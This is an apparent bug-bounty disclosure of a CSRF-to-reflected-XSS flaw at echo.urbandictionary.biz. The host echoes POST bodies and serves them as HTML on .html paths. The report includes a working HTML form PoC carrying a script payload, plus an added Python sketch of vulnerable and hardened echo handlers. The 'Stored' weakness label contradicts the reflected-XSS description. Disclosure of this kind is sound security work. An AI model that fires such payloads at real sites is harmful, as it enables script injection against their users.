CSRF to Reflected XSS at echo.urbandictionary.biz via spoofing content type
Medium
Urban Dictionary
Reported by
osama-hamad
## Details
The host is vulnerable to reflected XSS because it echoes the body of any POST request back in the response. When the request is sent to any existing or non-existing path with an .html extension, the response Content-Type is set to HTML, so the echoed body is rendered as a page and any script it contains executes in the victim's browser.
## Proof of Concept
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://echo.urbandictionary.biz/xsxsxs.html" method="POST" enctype="text/plain">
<input type="hidden" name=" <script>alert(document.domain)</script>" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
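As an added illustration (not the reporter's code and not Urban Dictionary's), here is a minimal echo handler that reproduces the flaw described above, the response content type being picked from the requested path's extension, next to a hardened version that fixes the content type and tells the browser not to sniff it. The handler names, the constructed sample body and the marker string are assumptions.

```python
import mimetypes

# Constructed sample body: what a browser sends for an enctype="text/plain"
# form post with one hidden input and an empty value ("name=" plus CRLF).
# The marker stands in for the report's script payload.
SAMPLE_BODY = b"<b>constructed-marker</b>=\r\n"


def vulnerable_echo(path: str, body: bytes) -> tuple[int, dict, bytes]:
    """Behaviour the report describes: the Content-Type is guessed from the
    *requested* path's extension and the POST body is echoed verbatim."""
    ctype, _ = mimetypes.guess_type(path)   # "/xsxsxs.html" -> "text/html"
    return 200, {"Content-Type": ctype or "application/octet-stream"}, body


def hardened_echo(path: str, body: bytes) -> tuple[int, dict, bytes]:
    """Fixed form: the handler fixes the content type itself (the URL has no
    say), nosniff stops browsers from second-guessing it, and a restrictive
    CSP blocks script execution even if HTML rendering ever happens."""
    headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'",
    }
    return 200, headers, body


def renders_as_html(headers: dict) -> bool:
    """True when a browser would parse this response as an HTML document
    (and so execute any <script> in an echoed body)."""
    media = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return media == "text/html"


if __name__ == "__main__":
    for handler in (vulnerable_echo, hardened_echo):
        _, hdrs, _ = handler("/xsxsxs.html", SAMPLE_BODY)
        print(handler.__name__, "renders as HTML:", renders_as_html(hdrs))
```

The same check against real responses is a useful regression test for any echo or debug endpoint: assert that no user-controlled body is ever returned under a text/html content type.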
## Impact
Typical cross-site scripting impact: injection of malicious JavaScript into the victim's browser in the context of the vulnerable host.
State: Closed
Substate: Resolved
Weakness: Cross-site Scripting (XSS) - Stored